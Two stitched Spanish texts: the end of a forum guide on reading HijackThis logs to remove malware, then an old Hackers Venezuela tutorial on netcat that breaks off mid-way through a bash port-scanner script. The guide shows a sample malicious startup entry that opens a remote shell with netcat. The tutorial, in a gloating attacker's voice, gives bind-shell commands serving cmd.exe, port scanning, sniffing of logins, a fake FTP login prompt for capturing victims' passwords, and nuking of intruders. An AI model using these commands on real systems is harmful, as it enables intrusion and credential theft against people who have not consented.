Global: C:\Documents and Settings\All Users\Start Menu\Programs\Startup – > Apunta a todos los usuarios.

Cuando arreglas las entradas O4, HijackThis no borrará los archivos asociados con esta entrada. Deberás borrarlos manualmente, usualmente reiniciando lo máquina y entrando en modo seguro. Las entradas Global Startup y Startup trabajan un poco diferente. HijackThis borrará los accesos directos en esas entradas, pero no los archivos a los que apuntan. Si un ejecutable actual reside en los directorios Global Startup o Startup entonces será borrado.

Ejemplo de aplicación legítima:

HKLM\...\Run: [winamp] “C:\Winamp\winamp.exe” / (puede ir algún argumento)

Posible ejemplo de aplicación maliciosa:

HKLM\...\Run : [**] “nc –vv 210.x.x.x –e cmd.exe”

Puedes consultar algunas de estas listas de Startups legítimos para poder consultar tu Log y ver si las aplicaciones que inician con tu sistema son verdaderas o en un peor caso: troyanos, spywares o hijackers.
Estas listas te pueden servir:
http://www.answersthatwork.com/Tasklist_pages/tasklist.htm
http://greatis.com/regrun3appdatabase.htm
http://www.sysinfo.org/startuplist.php
http://www.pacs-portal.co.uk/startup_content.php#THE_PROGRAMS
http://www.kephyr.com/filedb/index.php
http://www.liutilities.com/products/wintaskspro/processlibrary/

Ejemplo: Archivo: control.ini: inet.cpl=no. Esto oculta las opciones de IE en el Panel de Control.

Si en el Log, encuentras una línea como esta y no esta puesta por ti o por otra persona de tu confianza o qué maneje el sistema, es signo de que una aplicación maliciosa esta intentando bloquear o dificultar la modificación de las opciones de IE. También puede ser una restricción puesta por algún software Anti-Spyware como SpyBot o Adware, en este último caso puedes dejarlo con tranquilidad, de lo contrario puedes utilizar Hijackthis para corregirlo.

Ejemplo :-

HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions

Estas opciones sólo son bloqueadas si el administrador lo ha hecho o por casualidado  o por uso personal se ha activado la función de Bloquear las opciones de IE desde el panel “Inmunizar” del software antispyware SpyBot: Search & Destroy.

Llave del Registro:

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System

Ejemplo de Lista O7 -

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System:
DisableRegedit=1

NOTA: En algunos casos, los administradores de determinados lugares, como cyber, empresas u otros sitios, bloquean el acceso al regedit para que no se modifique alguna configuración. Pero al ver esto, en tu sistema y no fue puesto por tí, puedes usar Hijackthis para borrarlo con tranquilidad.

Esto significa que verás las opciones que normalmente ves cuando das click derecho en alguna página web que estés viendo en tu navegador.

Llave del Registro: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt

Ejemplo de Lista O8 -

Extra context menu item: &Google Search -
res://c:\windows\GoogleToolbar1.dll/cmsearch.html

El listado para estas entradas mostrará los objetos que aparecen en el menú contextual cuando das click derecho, y qué programa es usado cuando das click en esa opción. Algunas, como “Browser Pal” deberían ser borradas siempre, y el resto deberías buscarlas en Google antes de hacer cualquier cosa. Un ejemplo de un programa legítimo que podríamos encontrar ahí sería la Google Toolbar.

Cuando arregles este tipo de entradas, HijackThis no borrará los archivos que vienen mencionados en la lista. Es recomendable que reinicies en modo seguro como en casos anteriores y borres esos archivos y/o carpetas de la toolbar mencionada.

Llave del Registro: HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensiones

Ejemplo de la Lista O9 -

Extra Button: AIM (HKLM)

Si no necesitas estos botones o los ítems del menú o los reconoces como malwares, puedes arreglarlas con seguridad.
Lo mismo que pasa en los grupos anteriores, Hijackthis no podrá borrar los archivos mencionados desde aquí, sino, qué tendrás que reiniciar y entrar en modo seguro para eliminar manualmente las carpetas y/o archivos maliciosos.

Ten cuidado, a la hora de remover estos objetos, ya qué si se eliminan de forma incorrecta, podrías perder el acceso a Internet.

Ejemplo de la Lista O10 -

Broken Internet access because of LSP provider 'spsublsp.dll' missing

Muchos escaneadores de virus empiezan a escanear virus, troyanos, etc., al nivel del Winsock. El problema es que muchos de ellos no reordenan los LSPs en el orden correcto después de borrar el LSP problemático. Esto puede causar que HijackThis vea un problema y muestre una advertencia, la cuál puede ser similar al ejemplo de arriba, aunque de hecho el Internet sigue trabajando. Deberías consultar a un experto cuando arregles estos errores. También puedes usar LSPFix para arreglar esto.
El SpyBot por lo general,  puede arreglar esto pero asegúrate de que tienes la última versión, ya que las antiguas tienen problemas.
Si no eres, un usuario muy avanzado con Hijackthis puedes utilizar una herramienta para reparar estos errores llamada: LSPFix (Descargar).
Aquí pongo una lista, para poder verificar si estas entradas son legítimas o no:
http://www.angeltowns.com/members/zupe/lsps.html

Si buscas por el menú de Herramientas >> Opciones de Internet verás la pestaña Opciones Avanzadas. Es posible que aparezca ahí un nuevo grupo de opciones agregando una entrada bajo una llave del registro.

LLave del Registro: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions

Ejemplo de la Lista O11 -

Options group: [CommonName] CommonName

Esto lo saqué del manual que leí, cito textual: “De acuerdo con Merijn, creador de HijackThis (y también de CWShredder, StartupList, etc.), sólo se conoce de la existencia de un hijacker que usa esto y es el CommonName. Si ves CommonName en la lista, puedes removerlo con seguridad. Si ves otra entrada deberías usar Google para investigar un poco.”

Llave del Registro: HKEY_LOCAL_MACHINE\software\microsoft\internet explorer\plugins

Ejemplo de la Lista O12: Plugin for .PDF: C:\Program Files\Internet Explorer\PLUGINS\nppdf32.dll

Muchos de los plug-ins son legítimos, así que deberías investigar con Google, antes de llegar a la conclusión de borrarlo.
Uno de los más conocidos plug-ins ilegítimos es el Onflow, que tiene extensión .OFB.

Cuando arregles este tipo de entradas con HijackThis, HijackThis querrá borrar el archivo listado. Hay ocasiones en que el archivo quizá esté en uso incluso si el Internet Explorer está cerrado. Sí, el archivo todavía no se elimina, deberás entrar en modo seguro y eliminarlo de forma manual.

Llave del Registro:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\DefaultPrefix\

Ejemplo de Lista O13 - WWW. Prefix: http://ehttp.cc/?

Si estás experimentando problemas similares al problema de arriba, deberías correr CWShredder. Este programa remueve todas las variaciones conocidas de CoolWebSearch que puedan estar en tu máquina.

Si CWShredder no encuentra o arregla el problema, entonces puedes usar el HijackThis para arreglar esta entrada cuando la encuentres.

Ejemplo de Lista O14 - IERESET.INF: START_PAGE_URL=http://www.searchalot.com

En conclusión, si ves una entrada de este tipo en tu log, no siempre quiere decir que sea mala. Puede ser puesta por tí, algún administrador del equipo, lo debes dejar siempre y cuando, conozcas la dirección del archivo. Por el contrario, si la desconoses, puedes marcarla y darle Fix Checked.

Llave del Registro: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains

Ejemplo de Lista O15 - Trusted Zone: http://www.arwinianos.net

Entonces, si vemos alguna entrada que desconocemos su procedencia o URL, procederemos a marcarla y darle Fix Checked.

Los objetos ActiveX son programas que son descargados desde sitios web y son guardados en tu ordenador. Estos objetos están guardados por defecto en: C:\windows\Downloaded Program Files. Estos tienen una referencia en el registro por su CLSID el cuál es una cadena larga de números entre llaves {}. Existen muchos controles ActiveX legítimos como este de ejemplo, el cuál es un visor iPix.

Ejemplo de Lista O16 - DPF: (iPix ActiveX Control) - http://www.ipix.com/download/ipixx.cab

O algún Activex, para jugar algún juego online.
Muchos son legítimos, pero también lo hay para ser usado con otras intenciones.

Si ves nombres o direcciones que no reconozcas, deberías buscar en Google para ver si son o no legítimos. Si confirmas que son ilegítimas, puedes arreglarlas. Borrando los objetos ActiveX de tu computadora, no tendrás mayor problema que descargarlos nuevamente cuando entres de nuevo a la página desde donde los descargaste.
Como ya dijimos más arriba, no todos los Activex, son ilegítimos. Muchos de estos son utilizados por sitios web autorizados que permiten acceder a ciertas funciones que no se permiten sin el objeto Activex.
Por ejemplo:
Cualquier AV online, como Eset, Kaspersky necesitan de un Activex para poder ejecutarse y ver el contenido de tus ficheros para poder analizarlos.

Cuando arregles este tipo de entradas con HijackThis, HijackThis querrá borrar el archivo listado. Hay ocasiones en que el archivo quizá esté en uso incluso si el Internet Explorer está cerrado. Sí, el archivo todavía no se elimina, deberás entrar en modo seguro y eliminarlo de forma manual.

Cuando nos dirijimos a un sitio web usando un dominio, como www.hotmail.com, en lugar de una dirección IP, tu computadora usa un servidor DNS para transformar el nombre de dominio en una dirección IP parecida a 200.56.15.85. El hackeo de dominios sucede cuando el hijacker cambia los servidores DNS en tu máquina para poder apuntar tus DNS a donde ellos quieran para poder dirijirte a cualquier sitio que quieran. Agregando www.hotmail.com a sus servidores DNS, ellos pueden hacer que cuando vayas a www.hotmail.com, te redirijan al sitio de su elección, por ejemplo, un sitio que descargue más malware a tu ordenador o te infecte con algún troyano.

Ejemplo de Lista O17 - HKLM\System\CS1\Services\VxD\MSTCP: NameServer = 69.57.146.14,69.57.147.175

Si ves entradas de este tipo y no reconoces el dominio perteneciente a tu ISP o la compañía que te proporciona conexión a Internet, y los servidores DNS no pertenecen a tu ISP o compañía, entonces deberías usar HijackThis para arreglar esto.
En otro caso, podrías hacer un Whois a la dirección IP para ver a que compañía pertenecen.

Este método es usado para cambiar los controladores de protocolo estándar que tu computadora usa a otros que el hijacker proporciona. Esto permite al hijacker tomar control de ciertos canales en que tu computadora envía y recibe información.

Llaves del Registro:
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Filter

HijackThis primero lee la sección de protocolos del registro en busca de protocolos no-estándar. Cuando encuentra uno muestra el CLSID para mayor información así como la ruta del archivo.

Ejemplo de Lista O18 - Protocol: relatedlinks - - C:\PROGRA~1\COMMON~1\MSIETS\msielink.dll

Los más comunes que hacen esto son CoolWebSearch, Related Links, y Lop.com. Si ves estos nombres puedes arreglarlos con HijackThis.
Usa Google para investigar si los archivos son legítimos. También puedes usar la Lista O18 de Castlecops como apoyo para verificar los archivos.

Cuando arregles este tipo de entradas con HijackThis, HijackThis querrá borrar el archivo listado. Hay ocasiones en que el archivo quizá esté en uso incluso si el Internet Explorer está cerrado. Sí, el archivo todavía no se elimina, deberás entrar en modo seguro y eliminarlo de forma manual.

Una hoja de estilo es una plantilla para saber cómo mostrar las capas, colores y fuentes que se visualizan en una página HTML. Este tipo de hijacking sobreescribe la hoja de estilo por defecto, la cuál fue diseñada para ayudar a los usuarios, y provoca largas cantidades de pop-ups (ventanas emergentes de publicidad) ya sea para causar SPAM, molestia o una lentitud potencial.

Llaves del Registro: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Styles\: User Stylesheets

Ejemplo de Lista O19 - User style sheet: c:\WINDOWS\Java\my.css

Por lo general, estas entradas se pueden reparar con Hijackthis sin mayores problemas.
Cuando arregles este tipo de entradas con HijackThis, HijackThis querrá borrar el archivo listado. Hay ocasiones en que el archivo quizá esté en uso incluso si el Internet Explorer está cerrado. Sí, el archivo todavía no se elimina, deberás entrar en modo seguro y eliminarlo de forma manual.

El valor del registro AppInitDLLs contiene una lista de dlls (librerías) que se cargarán cuando user32.dll está cargando. Muchos ejecutables de Windows usan la librería user32.dll, lo que significa que cualquier DLL que esté listada en la llave del registro AppInit_DLLs también será cargada. Esto hace que sea muy difícil remover la DLL ya que estará cargando con múltiples procesos, muchos de los cuales no pueden ser detenidos sin causar inestabilidad en el sistema. El archivo user32.dll también es usado en procesos que inician automáticamente por el sistema cuando tu te logueas. Esto significa que los archivos cargados en el valor AppInit_DLLs serán cargados casi al inicio en la rutina de arranque de Windows permitiendo a la DLL esconderse o protegerse a sí misma antes que tengamos acceso al sistema.

Este método es conocido al ser usado por una variante de CoolWebSearch y sólo puede verse en Regedit dando click derecho sobre el valor, y seleccionando Modificar dato binario. Registrar Lite , por otra parte, puede ver más fácil esta DLL.

Llave del Registro: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows

Ejemplo de Lista O20 - AppInit_DLLs: C:\WINDOWS\System32\winifhi.dll

Existen muy pocos programas legítimos que usan esta llave del registro, pero debes proceder con cuidado cuando decidas borrar los archivos que son listados aquí. Usa Google o alguna lista(Lista de Startups de Bleeping Computer) como soporte para investigar si los archivos son legítimos o no.
Cuando arregles este tipo de entradas con HijackThis, HijackThis querrá borrar el archivo listado. Hay ocasiones en que el archivo quizá esté en uso. Sí, el archivo todavía no se elimina, deberás entrar en modo seguro y eliminarlo de forma manual.

Esta llave contiene valores similares a los de la llave Run del registro. La diferencia es que ésa en lugar de apuntar al archivo mismo, ésta señala al InProcServer del CLSID, el cuál contiene la información acerca del DLL en particular que se está usando.

Los archivos bajo esta llave son cargados automáticamente por Explorer.exe cuando tu computadora inicia. Como Explorer.exe es la shell para tu computadora, ésta siempre se va a cargar, así también cargando los archivos bajo esta llave. Estos archivos son por lo tanto cargados tempranamente en el proceso de inicio antes de que ocurra cualquier intervención humana.

Un hijacker que usa el método puede reconocerse por las siguientes entradas:

Ejemplo de Lista: R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = C:\WINDOWS\secure.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = C:\WINDOWS\secure.html

Llave del Registro: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad

Ejemplo de Lista O21 - SSODL: System - - C:\WINDOWS\system32\system32.dll

Hijackthis, tiene una base de datos interna que ya reconoce las aplicaciones legítimas y no las lista en el log, asique, cualquier entrada O21 que aparezca ya la puedes considerar sospechosa.
Puedes usar Google para consultar sobre esa DLL o esta lista de DLL’s:
Lista de DLL’s del grupo O21 de Bleeping Computer.

Cuando arregles este tipo de entradas con HijackThis, HijackThis querrá borrar el archivo listado. Hay ocasiones en que el archivo quizá esté en uso. Sí, el archivo todavía no se elimina, deberás entrar en modo seguro y eliminarlo de forma manual.

Llave del Registro:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler

Ejemplo de Lista O22 - SharedTaskScheduler: (no name) - - c:\windows\system32\mtwirl32.dll

Ojo! a la hora de borrar estas entradas, ya que algunas son legítimas.Puedes usar Google para buscar más información o ayudarte con esta lista:
Lista de Bleeping Computer O22.

HijackThis borrará el valor asociado del SharedTaskScheduler con esta entrada, pero no borrará el CLSID al que apunta ni el archivo al que apunta el Inprocserver32 de CLSID. Por lo que, como en los grupos anteriores, deberemos entrar en modo seguro y borrarlo manualmente con Unlocker u otro programa similar.

HECHO POR: Zinc

Fuente: http://foro.elhacker.net/seguridad/iquestcomo_leer_un_log_de_hijackthis_y_corregir_posibles_problemas-t188566.0.html

==========================================
Netcat.
Sacandole Provecho a una exelente Utilidad.
por: Kliber.
kliber@hven.com.ve
Hackers Venezuela
==========================================

Netcat es un pequeño programa creado para uso de los administradores de redes (y por supuesto para los Hackers) , este proggie fue creado originalmente por Hobbit y porteado a Win95 y NT por Weld Pond de L0pht , tiene mas de un año desde que fue Liberado y muy poco se ha escrito sobre este Programita; Principalmente porque la estructura de sus comandos es poco familiar para el usuario medio. Netcat tiene infinidad de funciones, aunque se deja que sea el usuario quien las averigue , y en el archivo de ayuda ponen algunos ejemplitos muy elementales solamente.

La especialidad de NetCat es el Protocolo tcp/ip, y le dá a la máquina de windows, cierto poder sobre este protocolo que solo tenía UNIX, trabaja con lineas de comandos desde MS-DOS (o desde el Shell de Linux), y según parece, puede hacer casi cualquier cosa sobre TCP/IP. El comando principal es nc con su respectiva variable u opción al mas puro estilio Unix.

Cabe destacar que la información sobre Netcat y sus usos especificos es bastante limitada; aunque Hobbit en su documento aclara muchas cosas, cita algunos ejemplos y dice que NetCat puede ser utilizado para mas de 1001 vainas…

Netcat puede ser encontrado en: http://www.l0pht.com/~weld/netcat

Netcat en WinX
==============

Este es el resultado de el comando de ayuda de netcat en una máquina windows

c:>nc -h

connect to somewhere: nc [-options] hostname port [ports]
listen for inbound: nc -l -p port [options] [hostname] [port]
options:

-d detach from console, stealth mode
-e prog inbound program to exec [dangerous!!]
-g gateway source-routing hop point, up to 8
-G num source-routing pointer: 4, 8, 12, …
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]

Bien; un analisis rápido de estas variables nos da una idea del potencial de este pequeño programa y las infinitas posibilidades que nos ofrece el poder manejar conexiones de una manera tan básica y sencilla:

<—— Opciones de Netcat ———>

-d (Modo Stealth o encubierto)
Esta opción desvincula al Programa de la consola, haciendolo trabajar en el BackGround.

-e (Ejecuta un programa cuando se conecta)
Puede ser utilizado para ejecutar incluso un Shell tanto en WinX como en *NIX.

-l (Escuchando conexiones)
Deja a un puerto abierto en espera de una conexión

-L (lo mismo que anteriormente pero sigue escuchando aún cuando la conexión es cerrada)
Esta opción es incluida en la versión de Weld Pond de L0pth, y es muy util para seguir escuchando en el puerto, a diferencia de -l (que la conexión cerrada termina con el proceso de nc) esta opción -L permite seguir escuchando en el mismo puerto (la rutina de nc -l es
reiniciada).

-n (Dirección numerica especifica; no hace un DNS Lookup) Netcat tiene la facultad de resolver nombres de dominio mediante un DNS Lookup, con esta opción le especificamos que no lo haga, y use solamente direcciones IP.

-o (obtiene un archivo log en Hex de la acción) Genera un Log de las actividades de netcat en código Hexadecimal.

-p (Puerto para pegarse) Algunas veces debes especificarle con esta opción el puerto a realizar una acción.

-s (pegarse a un IP especifico) Netcat puede utilizar IP de una red como fuente local.

-t (Funciona como un pequeño demonio telnet) Con esta opción le especificas a netcat que debe realizar negociaciones telnet.

-u specify UDP (Utilizar Protocolo UDP) Con esta opción le dices a netcat que trabaje con protocolo UDP en vez de TCP.

-v (modo verbose, mas información, se le puede añadir otra -v para mas info todavia) Bastante util y necesario, sobre todo para estudiar demonios en profundidad y observar todos los detalles en un Sniffing.

-w (Especifica un tiempo para terminar) Con esta opción le especificas un
tiempo determinado para realizar conexiones.

-r (Genera un Patron Ramdom de puertos locales o remotos) Muy util para evitar patrones lógicos de Scanning.

-g (especificar Gateways) Una de las opciones más interesantes de netcat, permite utilizar Routers como “puentes” de conexión.

-G (Especificar puntos de Routing), Con esta opción podemos crear una cadena aleatoria de hosts para crear un ruta perdida para tus paquetes (Spoofing).

-i Especifica un intervalo de segundos entre puertos Scaneados.

<————- Fin de las opciones comentadas ——>

Netcat en Linux
===============

Netcat en una plataforma como Linux se convierte en una utilidad muy potente, pudiendo ser utilizado en conjunto con lenguajes de programación como Perl y C , o bien desde la propia Linea de comandos del poderoso Shell de Linux mediante Shell Scripts.

Cabe destacar que distribuciones como RedHat Linux trae junto con sus paquetes de instalación una versión limitada de netcat; lo mas recomendable es bajar de la red la versión full de netcat para Linux (Importante: La versión de netcat para linux viene a prueba de lamers, por lo cual debemos compilar a netcat con unos flags especiales para poder obtener las opciones.

-t y -e (Telnet y Gaping Security Hole) ). Bajas el .tar de netcat y lo desempaquetas en el directorio de tu preferencia, te ubicas dentro del directorio de netcat y lo compilas con Make utilizando las siguientes Flags:

[root@DarkStar] #make linux DFLAGS=” -DTELNET -DGAPING_SECURITY_HOLE”

Copias el binario (nc) al directorio /usr/bin , de esta manera podras usar netcat directamente llamandolo de cualquier parte del Shell, ademas de que podrás usar los scripts que hagas (o consigas en la red) sin problemas; netcat trae unos scripts muy interesantes y bien comentados para que los estudies y comprendas mejor su implementación en scripts, los scripts están en el
directorio donde desempaquetastes netcat en /scripts , los corres como siempre: ./probe (o el script que quieras).

Utilizando Netcat.
==================

Para ilustrar mejor como trabajamos con este programa, lo mejor es observar ejemplos prácticos y analizar su estructura para poder comprender mejor como funciona y así poder crear nuestras propias aplicaciones.

Algunas de las cosas que podemos hacer con NetCat son:

Obtener un Shell rapidamente en una máquina remota usando la opción -l (Listen) conjuntamente con la opción -e (ejecutar) , cuando el proggie corre con estas variables y la conexión es realizada, NetCat ejecuta el programa elegido y se conecta a stdin y stdout del programa en la conexión a la red.

nc -l -p 23 xxx.xxx.xxx.xx 23 -t -e cmd.exe

Este comando dejará a NetCat escuchando el Puerto 23 (telnet), cuando es conectado a travéz del cliente, ejecutará un Shell (cmd.exe) la opción -t le dice a NetCat que maneje cualquier negociación que el cliente pueda esperar….

Si esta conexión es realizada desde una máquina NT, el shell correrá los permisos del proceso que han generado a NetCat (Hmmm…) así que hay que ser muy cuidadosos

La belleza de NetCat es que puede hacer lo mismo en CUALQUIER puerto Puedes dejar a NetCat escuchando en los puertos NETBIOS, que están probablemente corriendo en la mayoría de las máquinas NT, de esta manera puedes lograr una conexión a una máquina que esté utilizando “Filtrado de Puertos” activado en TCP/IP security Network Control Panel, NT no parece tener ninguna seguridad alrededor de cuales puertos los programas de usuarios son permitidos amarrar, esto quiere decir en pocas palabras, ejecutar comandos y programas que puedan unirse a los Puertos NETBIOS.

Como anteriormente se mencionó, puedes utilizar a Netcat para estudiar diferentes puertos, con la siguiente sintaxis:

c:\>nc -v (puedes añadir otra -v)

Uno de los puertos mas interesantes a la Hora de Analizar un Host, es el puerto 79 (Finger) , puedes obtener nombres de usuarios e información muy util a la hora de planear un “Brute-Force Attack”, este comandito de Netcat te muestra la Flexibilidad del Proggie en cuestion, dandote una idea de sus posibilidades:

c:\>nc -v 79 <> log.txt

El comando anterior le dice a netcat que se conecte en modo verbose al Host predeterminado en el puerto 79 (Finger) y envie el contenido del archivo user.txt (OJO: no he probado esto con una posible lista de nombre de usuarios al azahar), la respuesta del servicio será guardada en el archivo log.txt

Scanner:
========

Netcat puede ser utilizado como scanner, sus multiples opciones le permiten realizar un gran número de combinaciones, pudiendo realizar Scannings en Puertos Random, en puertos conocidos, en modo ascendente o descendente, con intervalos de tiempo, utilizando gateways para evitar mostrar la IP fuente del Scanning, etc.

C:\nc11nt>nc -v -v -z 127.0.0.1 53 25 21

DNS fwd/rev mismatch: localhost != darkstar
localhost [127.0.0.1] 53 (domain): connection refused
localhost [127.0.0.1] 25 (smtp): connection refused
localhost [127.0.0.1] 21 (ftp): connection refused
sent 0, rcvd 0: NOTSOCK

Pues si; aqui tienen un pequeño y primitivo scanner, se le pueden añadir puertos escogidos como en el ejemplo anterior o asignarle un rango de puertos:

C:\nc11nt>nc -v -v -z 127.0.0.1 1-53

DNS fwd/rev mismatch:
localhost != darkstar localhost [127.0.0.1] 53 (domain): connection refused
localhost [127.0.0.1] 52 (?): connection refused
localhost [127.0.0.1] 51 (?): connection refused
localhost [127.0.0.1] 50 (?): connection refused
localhost [127.0.0.1] 49 (?): connection refused
localhost [127.0.0.1] 48 (?): connection refused etc…

Volvemos con la opción -v (verbose) y la Opción -z (zero i/o) que es usada para scanning, los puertos se lo especificamos al final del IP del host, bien sea individuales separados por un espacio; o por un rango de puertos.

Sniffer:
========

Otra de las interesante posibilidades de netcat es su capacidad para escuchar conexiones en cualquier puerto, pudiendo redireccionar todo el tráfico del mismo hacia un archivo o hacia pantalla, en este sencillo ejemplo, podemos observar las bases de un sencillo sniffer en Windows:

C:\nc11nt>nc -v -v -L 127.0.0.1 -p 23

DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 23 …
DNS fwd/rev mismatch: localhost != darkstar
connect to [127.0.0.1] from localhost [127.0.0.1] 1131
login: sniffado
password: jeje!!
puedo ver todo lo que escriben aqui… Muuuaaahahahahahah!!! B-]

Tambien podemos redireccionar toda la salida a un archivo e irnos a realizar otras actividades ,ientras netcat hace su trabajo:

C:\nc11nt>nc -v -v -L -p 23 127.0.0.1 -t >login.txt
DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 23 …

[Aqui viene la conneción...]

DNS fwd/rev mismatch: localhost != darkstar
connect to [127.0.0.1] from localhost [127.0.0.1] 1030

[Todo lo que escriba la connección se va al archivo login.txt]
sent 0, rcvd 42

[La opción -L permite que netcat escuche nuevamente al terminar la conexión,
"New Victims Wanted" Hehe!]

DNS fwd/rev mismatch: localhost != darkstar
listening on [127.0.0.1] 23 …

El Exploit-Explained: nc -v -v -L 127.0.0.1 -p 23
———————

Ejecutamos a Netcat con la opción o variable -v (verbose) (doblemente “verbose” por si acaso) esto hará que el resultado de netcat, sea mostrado directamente en pantalla (a diferencia del archivo usado por Dr._X) , la opción o variable -L (Listen, and listen again) nos permitirá dejar escuchando u “oliendo” en determinado puerto aun cuando la conexión sea interrumpida (listen again), con la variable -p le indicamos el puerto…

Al ejecutar a netcat con esa combinación de variables las opción -v me indica en pantalla el Host y el puerto de escucha:

DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 23 …

Realizo desde otra ventana un telnet a localhost (127.0.0.1) en el puerto 23, netcat me informa sobre lo que ocurre en el puerto 23:

DNS fwd/rev mismatch: localhost != darkstar
connect to [127.0.0.1] from localhost [127.0.0.1] 1131
login: sniffado

Voilá! un Sniffer en LocalHost! Jajaja!!!

Detector de Conneciones Sospechosas:
====================================

La posibilidad de dejar a netcat escuchando en determinados puertos, nos permite crear una especie de “trampa” para un supuesto agresor que utilize scanners, o herramientas tales como NetBus o BackOrifice en contra de nuestras estaciones. Incluso, podemos crear un archivo que haga un Flood y redireccionar su salida hacia la estación agresora en caso de una conexión no autorizada a determinado puerto. (jeje! y se me ocurren un monton de cosas más, Muaahahaha!)

Este es un ejemplo de un detector de BO, Je! y funciona! este es un ejemplo real de un dia como cualquier otro en IRC; he aquí el ejemplo:

C:\nc11nt>nc -u -v -v -L -p 31337 127.0.0.1 31337
DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 31337 …

invalid connection to [0.0.0.0] from nas1-064.ras.bqm.cantv.net
[161.196.246.65]
31338

Back Orifice utiliza el protocolo UDP para realizar sus travesuras, realiza la conexión desde un puerto aleatorio (casi siempre el 1080) aunque en este caso lo hizo desde el 31338 (posiblemente una variante de BO), por eso se utiliza la opción -u (protocolo udp) , netcat se queda esperando conexiones UDP en el puerto 31337 (default de BO) , cuando alguien hace un sweep a tu IP netcat lo detecta enviando a pantalla el IP y el DNS del agresor…

Luego un pequeño “Ping of Death” (Nuke) para el transgresor y le hacen un Scan para ver cuando desaparece B-]
nas1-064.ras.bqm.cantv.net [161.196.246.65] 48 (?): connection refused
nas1-064.ras.bqm.cantv.net [161.196.246.65] 47 (?): connection refused
nas1-064.ras.bqm.cantv.net [161.196.246.65] 46 (?): connection refused
nas1-064.ras.bqm.cantv.net [161.196.246.65] 45 (?): TIMEDOUT
nas1-064.ras.bqm.cantv.net [161.196.246.65] 44 (?): TIMEDOUT<–Chao!!! Jeje!! Otros usos Miscelaneos: ======================= Puedes utilizar algo de ingienería social para capturar algunos passwords con netcat, por ejemplo, si una máquina no tiene abierto el puerto de FTP o de telnet, creas un archivo de texto que solicite el ID y el Password de la víctima; algo así: Microsoft Internet FTP Server V.5.9 [Beta] 04/16/99 myhost.com Please introduce Username, password and press “Enter” LogOn: Luego redireccionas el archivo hacia la victima: C:\nc11nt>nc -v -v -L -p 21 nombre del host -t <> nc -v nombre del host 23(o el puerto de tu preferencia)

Netcat y Programación:
======================

Esta combinación desencadena todo el Poder de Netcat en su máxima expresión; Tratandose de una herramienta que funciona con lineas de comandos, su integración con un lenguaje de programación le permite realizar gran cantidad de tareas, y posibilidades se van descubriendo dia a dia con su inclusión en nuevos Scripts y Exploits.

Muchos ScriptKiddies que no tienen idea de lo que hacen, se sienten frustrados porque muchos de los Scripts y Exploits que bajan de la Red simplemente no les funciona, porque no saben interpretar el Código y por lo tanto son incapaces de efectuar las modificaciones necesarias para incluir librerias, paths o utilidades necesarias para su funcionamiento. (Jódanse ScriptKiddies!!! Jajaja!!)

Netcat es exelente para implementar exploits remotos, permitiendo enviar el código a cualquier puerto vulnerable con una simple orden, logrando ejecutar todos los comandos necesarios para explotar determinados servicios.

Varios exploits que circulan actualmente en la Red, usan a netcat como “motor” para manejar las conexiones, si analizamos el código de estos programas podemos observar un nc por ahí, esto significa que el Proggie en cuestión necesita una versión correctamente compilada de netcat en el
directorio /usr/bin . A continuación un pequeño programa realizado por el Doctor_X de Hven utilizando a netcat:

<———- Hven Port Scanner!! ——>

# !/bin/bash
# Scanner de Puertos
# By DoctorX 17/04/99 email: d0ct0r_x@bactery.8m.com
# Zona de Bacterias http://bactery.8m.com
# Hackers de Venezuela http://www.hackhour.com.br/hven
# Este es un shell script hecho por mi para la verificacion de
# conexiones a un host utilizando netcat.

# Declaracion de Variables

export NETCAT=” nc -v -v -w 8 -z “
export RANGO=$2
LOCALHOST=$(uname -n)
export PUERTOS=”21 23 25 79 80 110 111 113 139 143 513 514 515 6000 31337″
export MEM1=”Scanner de Puertos “
export MEM2=”by “
export MEM22=”para Hackers Venezuela”
export MEM3=”Victima : “
export MEM4=”Falta el GateWay para el Source Routing !!!!!!”
export MEM5=”Te van a pillar !!!!!!! $USER jejejejeje “
export MEM6=”Local Host : $LOCALHOST “
export MEM7=”UDP Scan “
export MEM8=”http://www.hackhour.com.br/hven“
export re=”[5m"
export cl="[0m"
export rojo="[31m"
export email="email:d0ct0r_x@bactery.8m.com"

# Declaracion de Funciones

# Mensaje cuando no se le dan Parametros

function mem() {
local uso="uso :$0 [opcion] “
local DRX=”DoctorX”
echo $MEM1
echo $MEM2 ${rojo}$DRX${cl} $MEM22
echo $MEM8
echo ${rojo}$uso${cl}
echo ” :IP/HOSTNAME de La Victima jejejeje “
echo ” :source-routing , es opcional “
echo “opciones : “
echo “u :esta opcion de utiliza para hacer scan udp”
echo “so eterminacion de SO de servidores Web”
echo “r rango_de_puertos :Cambia el rango de puertos por defecto :plow-phi” &&
exit ; }

# Mensaje Inicial

function mem2() {
